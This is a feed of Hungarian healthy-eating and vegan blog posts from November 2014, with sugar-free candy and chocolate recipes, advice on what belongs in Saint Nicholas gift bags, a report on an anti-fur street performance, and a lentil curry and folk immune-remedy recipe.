datolya - 4-5 csepp narancsolaj - 1/2 mokkáskanál vaníliapor - 2 evőkanál cukrozatlan kakaópor - csipet só Elkészítése: A diót és a kis darabokra vágott datolyát tegyük egy késes konyhai gépbe, és morzsásra vágjuk. Ezután adjuk hozzá a kakaóport és a mandulát, és csak pár pulzálással daráljuk össze, hogy a mandula kissé nagyobb darabokba maradjon.Cseppentsük bele a narancsolajat, és gyúrjuk össze. Egyesével formáztam belőle szaloncukor formát.Mártsuk be nyers, narancsos csokiba.2. Fahéjas aszaltszilva zselés szaloncukor Hozzávalók: - 10 dkg aszalt szilva (legjobb a házi-, kén-dioxid- és cukormentes) - 10 dkg cukrozatlan aszalt datolya - 1/2 mokkáskanál ceyloni fahéj - 1/2 mokkáskanál vaníliapor Elkészítése: Először is vágjuk fel az aszalványokat kis darabokra. Éppen csak egy kicsi vizet öntsünk rá, és 1-2 órát hagyjuk puhulni.A felesleges vizet öntsük le róla, és ezután minden mehet a botmixerbe vagy a késes darabolóba. Nem muszáj, hogy teljesen krémes legyen.Ha formázható, akkor készíthetjük is a szaloncukrot. Ha egy kissé lágy lett a massza, akkor terítsük ki úgy 1 cm vastagon és tegyük be az aszalóba, vagy a sütőbe, vagy akár a radiátorra.Ezt szintén mártsuk be nyers csokiba. Én azért tettem hozzá datolyát, mert nekem házi aszalt szilvám van, és egy kissé savanykás. A datolya kellően megédesítette. 3. Zserbó szaloncukor Ennek itt találod a receptjét. A NYERS CSOKI receptjét itt találod. Jó étvágyat!
Mi kerüljön a mikuláscsomagba? 10+1 egészséges alternatíva
2014. november 29. Éltető ételek
Az előző blogban leírtam, hogy mi NE kerüljön a mikuláscsomagba , de a most nézzük meg azt, hogy én mit szoktam egy csomagba tenni. Sok esetben legjobb az, ha mi magunk készítjük el, persze tudom, hogy sokunknak erre nincs ideje. Akkor azt tanácsolom, hogy mindenképp az összetevők alapján döntsünk. Törekedjünk a természetességre. Én szeretem a DM Alnaturás termékeit, de a Bionomban is vannak nagyon jó mikuláscsomagba való ajándékok. 1. Kisebb játékok Biztos meglepő, hogy ezzel kezdem a sort. Nos, a gyerekek nagyon, de nagyon tudnak örülni apró-cseprő ajándékoknak. Mi neveljük a gyerekeket arra, hogy csak édességeket teszünk a csomagba. Mi lenne, ha csak kisebb játékok lennének benne, esetleg egy jó minőségű csokimikulás. Ovisoknak, kisiskolásoknak nyugodtan vehetünk kisebb foglalkoztató füzeteket, színezőket, aranyos kis radírt, különleges csillogó tollat , mesefigurás füzetecskét, kulcstartót, vidám hajcsattot. De kerülhet a csomagba egy kisautó vagy éppen egy játék kisállat. Inkább kisebb darabok legyenek, de akár több is, mint egy nagy. De azért ár-érték arányban legyen. Szerintem ezeknek örülnek igazán a gyerekek. (A 12 éves nagylányom meglátva ezt a macit, rögtön mondta, hogy ő szeretne egy ilyet.) 2. Magas kakaóvaj tartalmú csokimikulás Ez azért nem hiányozhat a csomagból, hiszen Mikulás van. 50-70% csokimikulást lehet kapni, válasszunk ezek közül. Ne legyen töltött, ízesített, csak natúr, kakaóvajas, étcsokis. 3. Mogyoró A dalocskából adódóan ez is kell egy csomagba, és a beszerzése sem olyan bonyolult. Héjas változatban vásároljuk meg. 4. Téli idénygyümölcsök Természetesen ezek mindennaposak, így mikuláskor se hiányozzon. Egy szép piros alma, narancs vagy mandarin üde színfoltja lesz a csomagnak. 5. Aszalt gyümölcsök változatosan Ezek kis csomagokba helyezve önmagukban is finomak. Vásárlás során figyeljünk oda, hogy kén-dioxid mentesek legyen. De feldobhatjuk egyszerűségüket úgy is, hogy megtöltjük pl. olajos maggal, vagy házi marcipánnal, és ezt csokiba mártjuk. Házilag készíthetünk aszalt almát, melyet szintén lehet csokiba mártani. 6. Diákcsemege Jó sok pénzt kérnek ezért, így házilag egyszerűen elkészíthetjük. Kedvenc aszalványunk és olajos magunk kerül bele (akár kisebb, egyforma darabokra is vághatjuk), egy szép kis zacskó, színes szalag, és kész is. Nem kell hozzá diploma ... 3. Trüffelből szaloncukor Nos, olajos mag és aszalvány egyvelegéből isteni finom trüffeleket lehet készíteni. Amennyiben ezeket csokiba mártjuk, és szép, díszes paprírba csomagoljuk, kész is az egészséges szaloncukor. De ha csak pici muffinos papírokba helyezzük, és úgy csomagoljuk, mint a boltban kapható Raffaellót, az is nagy sikert arat. Készíthetünk brownie, nutellás vagy éppen "Dunakavicsos" trüffelt, de a házi Raffaello is finom. 7. Csokoládé Nincs olyan gyerek szerintem, aki nem szereti a csokoládét. Készíthetünk házilag, de vásárolhatunk kis csokipasztillákat, melyeknek kifejezetten magas polifenol és C-vitamin tartalma van. Tehát nemcsak finom, de még immunerősítő is! Ezekből kis csomagocskákat készíthetünk. 8. Müzliszelet Itt szintén kifejezetten fontos az összetevők vizsgálata. Megbízhatóakat vásárolhatunk, de egyszerűen házilag is készíthetünk. 9. Kekszek A Piszkei biopékségnek ízletes kekszei kaphatók, édes és sós ízben is. Házilag készítve kis mikulásokat süssünk, de a mézeskalácsnak sem fognak nemet mondani a gyerekek. Egy szép mézeskalács szívecske feldíszítve, egy kis zacskóba téve... Ennyi az egész. 10 + 1 Aszalt édességek Ez a plusz 1 pont kifejezetten az aszalóval rendelkező anyukáknak ajánlom. Egyszer? zserbó krékert, vagy más édes aszalványt készíthetünk, de gyümölcslapból gumicukor is készülhet. Ha megnézitek az általam ajánlott alternatívákat, mindegyik teljes értékű, a gyerekek szervezetét és elméjét tápláló finomság.
Egészséges csoki házilag
2014. november 29. Éltető ételek
Ismeritek Gombóc Artúr történetét? Nos, a gyerekeim hasonlóan éreznek a csokoládé iránt: A kerek csokoládét, a szögletes csokoládét, a hosszú csokoládét, a rövid csokoládét, a gömbölyű csokoládét, a lapos csokoládét és minden olyan csokoládét, amit csak készítenek a világon. Viszont, ha nem akarunk úgy járni, mint ez a kedves kis madár, akkor készítsünk egészséges és nyers csokoládét. Ez kerülhet édességek tetejére, vagy akár önmagában bon-bon is készíthető belőle. Dúsíthatjuk kedvenc aszalványunkkal vagy bármilyen olajos maggal. Mindenképp próbáljátok ki a mogyorós csokit, amibe összetört, pirított mogyoró kerül. Amennnyiben superfoodokat teszünk bele, remek immunerősítő, élénkítő vagy akár hormonharmonizáló édességünk lesz. Tejcsokis hatás elérése érdekében tegyünk bele finomra őrölt kesudiót. Hozzávalók: - 10 dkg kakaóvaj - 3-5 dkg cukrozatlan kakaópor - 2-3 evőkanál juharszirup - 1/2 kávéskanál vaníliapor Elkészítése: Vízgőz fölött olvasszuk föl a kakaóvajat, majd adjuk hozzá a kakaóport és az édesítőt.Alaposan keverjük össze egy habverővel, majd ezt a csokit bevonóként használhatjuk édességekhez. Amennyiben csoki bon-bont szeretnénk készíteni, akkor öntsük a masszát szilikon formákba. Tegyük a fagyasztóba, majd amikor elkezd keményedni, díszítsük ízlésünk szerint aszalványokkal vagy magokkal.Ha superfoodot teszünk bele, akkor azt még dermedés előtt keverjük el a csokival. Hormonharmonizálásra kitűnő a maca, élénkítésére a guarana.Fogyasztásig tartsuk a hűtőben.
Élve nyúztak meg egy lányt a Váci utcán!
2014. november 28. Vegan Spirit
Az emberek fel sem fogták mi történik, csak álltak döbbenten, kérdésekkel teli fejjel, és nézték, amint a fiatal lányt élve megnyúzzák.
Így demonstrálták a szőrmeipar által elkövetett kegyetlenségeket, állatvédő aktivisták Budapesten, a Váci utca egyik elit szőrmeboltja előtt ma (2014.11.28.) délután. Beszédeikben felhívták az emberek figyelmét az állatok kihasználásának embertelen és felesleges mivoltára. Videó a nyúzásról ITT!
A performanceban senki nem sérült meg. A lenyúzott bunda viszont valódi volt, melynek egyetlen igaz tulajdonosai az a 20 ezüstróka volt, melyeket lemészároltak a bunda elkészítéséhez. Mint azt az emberhez közelálló halottakkal szokás, a bundát jelképesen eltemették, ezzel adva meg a végtisztességet az ártatlan áldozatoknak.
"Amíg nem az áldozatok szempontjából látjuk az eseményeket, addig könnyű kifogásokat, érveket találni tetteink igazolására, és könnyű közönyösnek maradni. Amikor mi kerülünk az áldozat szerepébe, akkor pedig lehetetlen igazolni azokat a tetteket, melyeket korábban véghezvittünk"
Az emberi hiúság az egyetlen oka annak, hogy ezeket az állatokat fogságban tartják, és ezrével ölik meg őket naponta. Mivel a bunda sértetlensége az elsődleges szempont, ezért a gyors, fegyver általi halál szóba sem jöhet. Éppen ezért rendszerint áramot vezetnek az állatok végbelébe és szájába, majd körülbelül fél percnyi szenvedés után múlnak ki. Kínában, és más keleti országokban, ahol az állatvédelem törvényi szinten is nagyon gyenge lábakon áll, bevett szokás, hogy az állatokat meg sem ölik, csak fejbe csapják, vagy földhöz vágják, és félig kábult állapotban nyúzzák meg őket. A youtube tele van videókkal, ahol ilyen különösen embertelen tettek láthatóak. Több videóban látszik, hogy a teljesen megnyúzott állatok felemelik a fejüket, és pislognak. Amit sokan nem tudnak, hogy akármelyik, kínából származó ruha szőrmecsíkja, gallérja készülhet ilyen módon lenyúzott kutya, macska és más állatok szőréből! Igen, itt is árulhatnak ilyen ruhadarabokat pár ezer forintért! Nem csak a kínai piacon, üzletben, hanem bármely kínában előállított ruhában benne lehet. Azzal, hogy tudatlanul megvesszük, azzal pedig támogatjuk, hogy holnap ismét élve nyúzzák őket, mert el tudják adni!
Az is elgondolkodtató, és jól mutatja a szőrme ipar képmutatását is, hogy idehaza, Közép-Európa legnagyobb csincsillafarmjára rendszeresen szerveznek általános iskolások számára kirándulásokat. Persze a gyerekek csak a cuki kis élő csincsillákat látják, de a színfalak mögött zajló kegyetlen valóságot elrejtik a szemük elől. El tudjuk képzelni, mi lenne, ha nem csak a szépet mutatnák meg a gyerekeknek, hanem a farm valódi célját, és a szőrme valódi árát is.
Felmerül tehát bennem a kérdés, hogy miért művelünk olyan dolgokat, amely nem összeegyeztethető sem az emberség, sem a szeretet, sem a felelős gondviselés fogalmaival? Miért csinálunk olyan dolgokat melyet nem csak gyermekeink előtt, de a társadalom előtt is titkolni kell? A társadalom pedig miért tűri, hogy bármiben is az ember fő mozgató rugója a kihasználás legyen?
A kihasználás az, ami alapját képezi az ember természethez és állatokhoz való viszonyának, holott önmaga nem viseli el, ha kihasználják. Ekkora ellentmondás pedig ideje, hogy szemet szúrjon végre!
Mond el ismerőseidnek te is, hogy mi A SZŐRME IGAZI ÁRA.
https://www.youtube.com/watch?v=wV2NPKied5s
Elég volt a szőrme iparból!
K. Bálint
Egészségre ártalmas mikuláscsomagok, avagy a 10 legveszélyesebb élelmiszer, ami a csomagokba kerülhet
2014. november 27. Éltető ételek
Van zsákodban minden jó, piros alma, mogyoró... Biztos mindenki ismeri ezt a kedves kis dalt. December 6-át megelőző este gyerekek milliói tisztogatják csizmájukat abban a reményben, hogy finomabbnál finomabb meglepetést kapjanak. Na de mi kerüljön a mikuláscsomagba? Jobban mondva, mi ne kerüljön? Összegyűjtöm azt a 10 immunromboló, egészségre ártalmas ajándékot, ami biztos nem kerül bele a gyerekeim csizmájába. Persze lehetne még sorolni, és nem megállni a tíznél, de remélem, hogy amennyiben elolvasod ezt a blogot, akkor látni fogod az alapelveket. Előljáróban minden olyan édesség kizárva, amelynek a fő összetevője cukor. Ezenkívül a hidrogénezett növényi zsiradék is kizárt, valamint az E-számokkal tűzdelt leírás. Azokat veszem sorba, amik mindig bekerülnek a gyerekeim óvodás csomagjaiba. Sajnos ezek a többnyire a kukában landolnak, miután a gyerekekkel közösen áttanulmányoztuk az összetevőket. Még a szegény gyerekeknek sem szívesen adom oda, hiszen ha az én gyerekeim egészségét károsítja, akkor a szegény gyerekekét is. Én meg azt nem szeretném... Valamint a mértéktelen csokoládé- és cukorfogyasztástól a gyerekek túlpörögnek és székrekedést kaphatnak, ezért is érdemes legalább a Mikulás-csomag egy részét az édességeknél tápanyagban gazdagabb élelmiszerekkel kiváltani. 1. Csokimikulások Nem minden csoki, ami annak látszik. Nézzük meg a mikulások talpára ragasztott leírást, amely alapján könnyűszerrel megállapíthatjuk, hogy a kosarunkba kerüljön-e vagy sem. Elsősorban azokra a csokoládékra gondolok, amelyeknek a kakaós tejbevonó massza, a hidrogénezett növényi zsíradék valamint a cukor a fő összetevője. Ugyanakkor ne dőljünk be a méretüknek sem, hatalmas csokimikulások kaphatók pár száz forintért. Nos, ezek biztos, hogy nem a gyerekek csomagjába valók! Sőt, még fokozzák mindezeket azzal, hogy a mikulás üregébe helyeznek különféle cukros drazsékat, pelyheket . Viszont nehogy úgy járjatok, mint ahogy a mellékelt képen látható. Mikulás csomagolásba húsvéti nyuszi volt. Úgy látszik, kimaradtak a tavaszi nyuszik, és azt becsomagolták karácsonyra. No comment... Törekedjünk arra, hogy étcsokit válasszunk, kapható olyan csokoládé is, melyek 60-70% kakaóvaj tartalommal rendelkeznek. Mindenesetre az első helyen a kakaóvaj álljon, akkor nagy hibát nem követünk el. 2. Szaloncukor Itt is találunk jó és kevésbé jó, valamint kifejezetten ártalmas szaloncukrokat. Zselés, marcipános eleve kizárva. Csak példaként kiragadva, ez egy magyar, nagyhírű csokoládégyár zselés szaloncukor jának az összetevője: "cukor, glükóz szirup, kakaós étbevonó massza 20% [cukor, növényi zsír, zsírszegény kakaópor (10%), emulgeálószer (szójalecitin), aromák (csokoládé- vanília)], étkezési sav (citromsav), zselésítő anyag (pektin), aromák (citrom, málna), színezék (E120)" Valamint ne dőljünk be az ÍZŰ elnevezéseknek sem, mert ezek egyáltalán nem tartalmazzák a valódi gyümölcsöt, csupán azok aromáját. Erre is egy példát hozok. Császárkörte ízű szaloncukor narancshéjdarabokkal : Fondan (cukor, glükóz szirup, víz), kakaós étbevonó massza (cukor, növényi zsír, zsírszegény kakaópor (16% emulgeálószer (szójalecitin), természetazonos aromák (csokoládé- vanília ízű), tejfehérje, hidrogénezett növényi zsír, szójaliszt, narancshéjdarabok, zsírszegény kakaópor, nedvesítőszer (szorbit), természetazonos aromák (császárkörte, narancsolaj aroma), étkezési sav (citromsav), emulgeálószer (szójalecitin), tartósítószer (kálium- szorbát), étkezési só, stabilizátor (invertáz) Na, ez hogy tetszik? Törekedjünk aszalt gyümölcsös, valódi kakaóvajas szaloncukrot vásárolni. Kaphatók kézműves szaloncukrok, de ebben az esetben is nézzük meg az összetevőket! 3. Gumicukor A fő összetevője állati eredetű zselatin, ami főleg a kötőszövetből készült. Ezenkívül rengeteg adalékanyagot tartalmaz, hiszen a színezéshez, az ízesítéshez, és a tartósításhoz is szintetikus szereket használnak fel, tehát a gumicukor valójában műanyag, ami egyáltalán nem egészséges. 4. Cukorkák Szerintem ez egyértelmű, de ne gondoljuk azt, hogyha vitaminnal dúsított, akkor milyen szuper. Nos, NEM. Sajnos ezek szintetikus vitaminok, melyek fokozzák a cukor káros hatásait. Egyébként minden anyukának, nagymamának, óvonőnek, tanárnőnek, élelmezésvezetőnek kötelezővé tenném a Cukor blues című könyv elolvasását! 5. Kinder tejszelet Nos, itt is van 1-2 varázsszó. Egyrész a kinder ugye gyereket jelent, tehát kifejezetten nekik készítette a gyártó. Valamint a méz és a tej is egy fontos varázsszó. Hű de jó, akkor ez egészséges. Nos, NEM. Valójában 57%-ban zsírból és cukorból áll. Pontos összetevője: pasztőrözött tej 40%, növényi zsír és olaj, cukor, búzaliszt, sovány tejpor, méz 5%, dehidratált vaj, tojáspor, sovány kakaópor, finom korpa, térfogatnövelő szerek (dinátrium-difoszfát, nátrium-hidrogén-karbonát, ammónium-karbonát), emulgeálószer (zsírsavak mono- és digliceridjei), aromák, étkezési só. Ha figyelmesen megnézzük, csupán 5 % mézet tartalmaz, ugyanakkor sokkal-sokkal több cukrot. Egy tejszelet nettó tömege 28 gramm, amelyben 2,5 kockacukornak megfelelő cukor található. 6. Kinder csokoládé Mit mond a gyártó? Több tej, kevesebb kakaó: az egyenként csomagolt tejes töltésű tejcsokoládé szeletek a gyerekek igényeinek figyelembevételével készülnek, kifejezetten gyerekméretben. Na de nézzük meg az összetevőjét is: tejcsokoládé 40% (cukor, teljes tejpor, kakaóvaj, kakaómassza, emulgeálószer: lecitinek (szója); vanillin), cukor, sovány tejpor (18%), pálmaolaj*, dehidratált vaj, emulgeálószer: lecitinek (szója); vanillin. Kakaószárazanyag-tartalom a tejcsokoládéban: legalább 30%. Összes tejszárazanyag: 33% - Összes kakaó összetevő: 13% Mielőtt még bármit is írnék, azt tudni kell, hogy mit tartalmaz egy jó csokoládé: kakaóvaj, kakaópor, természetes édesítő, pl. nádcukor). Mivel ez tejes, így tejport is tartalmaz. Szerintem az összetevőket megvizsgálva, mindenki döntse el maga, hogy bekerül-e a mikuláscsomagba ez a desszert. 7. Maoam Nos, én ezt még sosem kóstoltam, de a pénztárnál várakozva a gyerekek mindig ezzel nyaggatnak. Mindenesetre a csomagolás szuperül a gyümölcsökre épít (többek között cseresznyés epres, málnás, savanyú almás, lime, cólás ízben kaphatók), mintha telis tele lenne értékes, természetes vitaminokkal. A neten böngészve jövök rá, hogy ez nem más, mint olvadós rágó. És még dobozos kiszerelésben is kapható. Hűűű. Pontos összetevőt nem találtam, viszont a tápérték vizsgálata alapján 57%-a cukor! Ne haragudjatok, de ez KUKA!!!! 8. Nyalóka Hát, ez a halálom. Jó sokáig áznak azok a drága tejfogacskák a cukorszirupban, nincs ennél rosszabb. Biztos többen emlékeztek Kojak-re, a híres nyomozóra. Mindig a szájában lógott ez a cukorka. Bár kézműves nyalókák is kaphatók, de minden esetben a fő összetevője a cukor. Ezt találtam egy blog oldalán: Szörpös nyalóka hozzávalói: 1 pohár cukor (1,5 decis), fél pohár víz, negyed pohár (kb. 2 evőkanál) glükózszirup, 1 evőkanál sűrű szörp vagy 2 evőkanál rostos gyümölcslé. Nos, ha ilyen receptek vannak az oldalán, akkor gondolom, a vásárolható nyalókái is hasonló alapanyagokból készülnek. 9. Cukormentes rágóka Ezt olvasva, biztos sokan megörülnek, hogy VÉGRE! cukomenntes rágó. Na akkor most nézzük is meg, ha nem a cukortól édes, akkor mitől? Hát a töménytelen mesterséges édesítőktől . És bizony ez sem jobb, mint a finomított kristálycukor. Nézzünk ennek is egy összetevő listát: szorbit, izomalt, mannit, aszpartám, aszpartám-aceszulfám só, aceszulfám K, Gumi alapanyag (szójalecitint tartalmaz), Aromák, Fényező anyag: kalcium-karbonát, Nedvesítőszer: glicerin, Sűrítő anyag: gumiarábikum, Színezék: E171, Fényező anyag: karnaubaviasz, Antioxidáns: BHA Szerintetek szüksége van ezekre egy fejlődő szervezetnek? Szerintem nem. 10. Sóspálcika (ropi) Ezekből is lehet kapni jót és kevésbé jót. Egy átlagos ropi összetevői: búzaliszt, sütőmargalin (növényi olajok és zsírok, ivóvíz emulgeálószer: zsírsavak mono és trigliceridjei, étkezési só, savanyúságot szabályozó anyag: citromsav, színezék: béta-karotin, aromák), finomított napraforgó étolaj, kristálycukor, élesztő, konyhasó (2%), tej, ivóvíz, savanyúságot szabályozó anyag: nátrium-hidroxid. Nos, kezdem azzal, hogy a finomított lisztből készült ételeket érdemes kerülni. Ugyanis ezek a bélben csirízként szépen összeragadnak, és összetapasztják a bélbolyhokat. Ezzel az értékes tápanyagok felszívódását gátoljuk. Valamint tudjátok, hogy hogyan készül a finomított étolaj? Nos, ezt olvasd el. Ezek után döntsd el, hogy megvásárolod-e. Persze ne csapjanak be a jól hangzó szavak, hogy Tönkölybúzás sóspálcika. Ebben az esetben is fordítsuk meg a csomagolást. Ez az egyszerű ropi jócskán tartalmaz összetevőket: tönkölybúzaliszt (34,5%), teljeskiőrlésű búzaliszt (34,5%), ivóvíz, növényi zsír, kristálycukor, étkezési só (min. 2%), élesztő, tejsavópor, fényező anyag (nátrium-hidroxid), lisztjavító szer (búzamalátaliszt, emulgeálószer: zsírsavak mono- és digliceridjeinek mono- és diacetil bórkősav észterei; szójaliszt, emulgeálószer: zsírsavak mono- és digliceridjei, étkezési só, lisztkezelőszer: aszkorbinsav, enzimek: amilázok) 10+1 Virgács Szerintem ne a mikuláscsomagba tett virgáccsal akarjuk fegyelmezni gyerekeinket, és kiemelni, hogy te rossz vagy. Én sose teszek virgácsot a csomagba. Összességében azt javaslom, hogy MINDEN ESETBEN olvasd el az összetevőket. Ez alapján el tudod dönteni, hogy az a finomság, amit a gyerekednek szeretnél adni, megvásárold-e. Ezek után felmerül a kérdés, hogy akkor mit is tegyünk a mikuláscsomagba, hogy a gyerkőc örüljön neki, és mi felnőttek, lelkiismeretfurdalás nélkül adjuk. Nos, a következő írásomban tippeket adok erre is. Felhasznált irodalom: http://tudatosvasarlo.hu/cikk/kinder-tejszelet-dietetikus-szemmel http://www.sarospatakhungaria.hu/szaloncukor/csaszarkorte+izu+szaloncukor+narancshejdarabokkal.html http://www.ferrero.hu/csokolade/ http://kezmuvesnyaloka.blogspot.hu/ http://www.origo.hu/tafelspicc/teszt/20140924-ropi-sos-palcika-teszt.html?pIdx=1
Kozáksapka vagy hólabda reformosan (vegán)
Gyermekkoromat idézi ez a süti. A legtöbb karácsonykor készítettünk ilyet. Örömömre szolgál, hogy ez is elkészíthető tojás, tej, fehér cukor, margarin nélkül. Remek lehetőség akár a (vegán) karácsony vagy más ünnep menüjébe iktatva, s így egészséget kímélve ugyanakkor hagyományos ízt sem nélkülözve lehet részünk az édes csábításban.
A recept
Hozzávalók:
Sütemény tésztája:
- 1 bögre liszt (1/3 része teljes kiőrlésű, 2/3 része fehér liszt
- 1 teáskanál szódabikarbóna vagy foszfátmentes sütőpor
- 1 evőkanál édesítő (kókuszvirág-cukor/gyümölcscukor/nyírfacukor, stb)
- 1 evőkanál karobpor vagy kakaópor
- 1/2 vanília belseje
- 2 evőkanál napraforgó olaj
- kb 1 bögre víz
Elkészítés:
Először a száraz alapanyagokat keverjük össze (liszt, szódabikarbóna/sütőpor, édesítő, karob por, vanília belseje), annyi vizet öntünk hozzá, ami által piskóta-szerű tésztát kapunk. Ekkor keverünk még hozzá egy kevés olajat. Kb. 20 perc alatt készre sütjük. A megsült tésztát pogácsaszaggatóval kiszaggatjuk, az így kapott korongokat kettévágjuk, megtöltjük mindegyik korongot krémmel, kókuszba forgatjuk a szélét, majd karobos/kakaós csokiszószt kanalazunk a tetejére. Hidegen tároljuk néhány órát vagy egy éjszakát, majd fogyasztható is.
Kókuszos krém:
- 1/2 liter rizstej (rizstejpor - gazdagon - és víz, vagy dobozos rizstej, vagy saját készítésű risztej)
- 10 dkg kókuszreszelék
- vanília belseje
- reszelt citromhéj
- 3-4 evőkanál édesítő (kókuszvirág-cukor/gyümölcscukor/nyírfacukor, stb)
- 2-3 evőkanál kukoricakeményítő
- 3 evőkanál lágy kókuszzsír
A krém elkészítése:
A rizstejet feltesszük főzni, és elkeverjük benne a lereszelt citrom héját, a kikapart vaníliát, a kókuszreszeléket és az édesítőt. A kukoricakeményítőt kb. 1/2 dl vízzel simára keverjük, és a rizstejhez keverjük folyamatos keverés közben. Miután besűrűsödött, mint a puding, levesszük, és langyosra hűtjük. Mielőtt kihűlne, beletesszük a kókuszzsírt. Egy kevés frissen facsart citromlevet is adhatunk hozzá.
Csokimáz:
- 2 evőkanál karobpor vagy kakaórpor1
- 2 evőkanál édesítő (kókuszvirág-cukor/gyümölcscukor/nyírfacukor, stb)
- 2 evőkanál kókusz zsír
- 3-4 evőkanál növényi tej
A máz elkészítése:
A kókuszzsírt megolvasztjuk, beleszórjuk a karobport, vagy kakaópor, hozzáadunk ízlésünknek megfelelő mennyiségű édesítőt (nádcukor, nyírfacukor, stb.) Alacsony lángon forráspontig keverjük, majd növényi tejet is hozzáadunk. Még kevergetjük, míg újra forrni kezd, lezárjuk, kihűtjük, majd a sütemény tetejére kenjük.
Indiai lencseragu édesburgonyával
2014. november 21. Gréta konyhája
Biztosan ti is sokszor gondolkodtok mit főzzetek este, milyen laktató, tartalmas, egészséges, de nagyon finom vacsorával lepjétek meg a családot. Nekem az agyam, (nem fog titeket meglepni) többnyire az ételek körül forog, de még így is vannak napok, amikor fogalmam sincs mit kellene főzni. Ez a recept tökéletes az ilyen napokra, főleg esős, hűvös időben. Nagyon, nagyon, nagyon imádom az autentikus indiai ételeket, és néha kifejezetten szeretem, ha elém rakják egy étteremben, de túlnyomó részt mégis otthon készítem el, mert az ízét nem lehet eltéveszteni, és sokkal költségtakarékosabb is. Hozzávalók: 4-6 személyre 400g lencse beáztatva 2 db édesburgonya 1 szál póréhagyma 2 fej vöröshagyma 5-6 gerezd fokhagyma hüvelyk ujjnyi friss gyömbér 1 csapott ek garam masala fűszerpor 1 csapott ek curry por 1/2 ek tikka masala fűszerpor só, vegamix ízlés szerint 1 doboz sűrű kókusztej 1-2 szál sárgarépa víz 1-2 ek tápióka liszt (kukoricakeményítő is jó) abban az esetben, ha kevesebb vizet adunk hozzá, és nem olyan leveses, elhagyhatjuk, de én szeretem főzelékesen. Egy wokban, (vagy nagyobb serpenyőben) felhevítem az olíva olajat, és megpárolom a felaprított hagymákat, majd a fokhagymák felét aprítva. Folyamatosan kevergetem kb 3 percig, majd belereszelem a friss, hámozott gyömbért, pirítom pár percig. Hozzáadom a félholdakra vágott répát, és a kisebb kockákra vágott édesburgonyát, majd a fűszereket, jól alaposan összekeverem, pár percig kevergetve rázogatva pirítom. Jöhet bele a beáztatott, lecsepegtetett, leszűrt lencse. Összekeverem, majd felöntöm annyi vízzel, hogy rendesen ellepje kb ujjnyi vastagon. Hozzáadom a maradék fokhagymát, és lefedve megfőzöm a lencsét, közben megdagad, besűrűsödik. Megsózom, majd ha a lencse puha, a kókusztej sűrűjét hozzáadom, átlátszó részét, pedig elkeverem a tápióka keményítővel csomómentesre. Kavargatva hozzáöntöm ezt a keveréket, és nagyon gyorsan keverem, mert sűrűsödni fog. Addig kevergetjük, míg újra fel nem forr, majd levesszük a tűzről. Főzelékállagot kell kapjunk. Én rendszerint ilyenkor még sózom, fűszerezem addig míg tökéletes lesz. Bármilyen kenyérfélével ajánlom. Jó étvágyat! UI: Gluténmenteseknek ajánlom még quinoával, vagy rizssel összekeverve. A fűszereket bioboltokban, vagy ázsiai alapanyagokat árusító üzletekben lehet beszerezni, de decembertől a tündérporok már a webáruházamban is elérhetőek lesznek.
Immunerősítés természetesen: gyömbéres-kurkumás-mézes-fokhagymás keverékkel
2014. november 18. Zizi kalandjai
Lekopogom, hogy idén ősszel még nem betegedtem le, noha hajtom magamat rendesen, de igyekszem pihenéseket beiktatni – még ha nehezen is megy -, hogy megadjam a testemnek, amit megérdemel. Van egy verses, mondókás könyvünk, Ádi imádja, így mindennap felolvasom neki a kedvenceit… a könyvben van egy vers a hónapokról. Novemberről azt írja, hogy télelő; decemberről pedig azt, hogy pihenő.
December az év utolsó hónapja, le kellene tennünk a lantot és lassítani kicsit, mégis ekkor gyötörjük magunkat őrült hajszába az idővel. Legalábbis én ezt tapasztalom… saját magamból indulok ki. Szaladok, igyekszem az idő előtt járni egy lépéssel, de néha megelőz. Hajtjuk magunkat karácsonyig, hogy még ez vagy az beleférjen, el legyen intézve, hogy aztán nyugodt, családi körben ünnepelhessünk, szépen megterített asztalnál.
A tökéletes világomban december tényleg a pihenésről szól. Sokat sétálunk, hópelyheket kergetünk, feldíszített karácsonyfákat keresünk a városban, csodálkozunk a fényeken, mézeskalácsot és egyéb finomságokat sütünk ráérősen, nyugodtan; és saját készítésű (gasztro) ajándékokat készítünk a szeretteinknek. Talán ideje lenne változtatni és a tökéletes világot átültetni a valóságba, ugye?
Szóval, ha túlhajszoljuk magunkat és ágynak dőlünk az ünnepek előtt vagy után, jól jön ez a természetes immunerősítő, amivel ápolhatjuk magunkat. Persze használhatjuk megelőzésre is, mert a szervezetünket érdemes erősíteni a téli hónapokban. Került bele minden, ami segít helyrehozni a náthát, megfázást, köhögést: méz, citrom, gyömbér, kurkuma, fokhagyma és egy kis almaecet.
A gyömbér gyulladáscsökkentő hatású, melyet ki lehet használni megfázás és hörghurut esetén. A kurkuma használható láz és fertőzések ellen, mézben feloldva pedig köptető és köhögéscsillapító hatású. A citromban sok a C-vitamin, segíti a meghűléses betegségek megelőzését, állítólag izzasztó hatású és a gyulladt torok is gyógyítható vele. A fokhagyma antibakteriális hatása révén légúti megbetegedések kezelésében is használatos. Főbb hatásai közé sorolandó még az antibiotikus (antibakteriális), nyálkaoldó hatás. A népi gyógyászatban meghűléses betegségeket is gyógyítanak vele. A fokhagyma baktérium ölő hatásának köszönhetően tisztítja a szervezetet. A méz tartalmaz kálciumot, rezet, vasat, magnéziumot, mangánt, foszfort, káliumot, nátriumot, cinket és kis mennyiségben B1, B2, B3, B5, B6, C-vitamitnt. Többek között kiváló baktériumölő hatásáról ismert, magas energiatartalmának köszönhetően alkalmazható a fáradtság és különböző betegségek leküzdésében is.
Nekem sikerült friss kurkumát beszereznem (ázsiai boltokban, külföldi alapanyagokat árusító piac standokon keressétek), de természetesen helyettesíthető por változattal is.
Gyömbéres-kurkumás-mézes-fokhagymás keverék
Hozzávalók:
- egy kis darabka (hüvelykujjnyi) gyömbér, meghámozva
- egy kis darabka (hüvelykujjnyi) kurkuma, meghámozva vagy 1-2 teáskanál kurkuma por
- 2 gerezd fokhagyma, meghámozva
- 1 evőkanál méz
- 1 evőkanál almaecet
- 1/2 citrom frissen facsart leve
Apró lyukú reszelőn reszeljük le a gyömbért, a kurkumát és a fokhagymát egy kis tálkába. Öntsük hozzá az almaecetet, a citromlevet és adjuk hozzá a mézet. Jól keverjük el és teáskanalanként fogyaszthatjuk a nap folyamán (éhgyomorra ne fogyasszuk!). Mellette mindig igyunk bőségesen tiszta vizet!
Vegán (édes)burgonyás pogácsa
2014. november 16. Zizi kalandjai
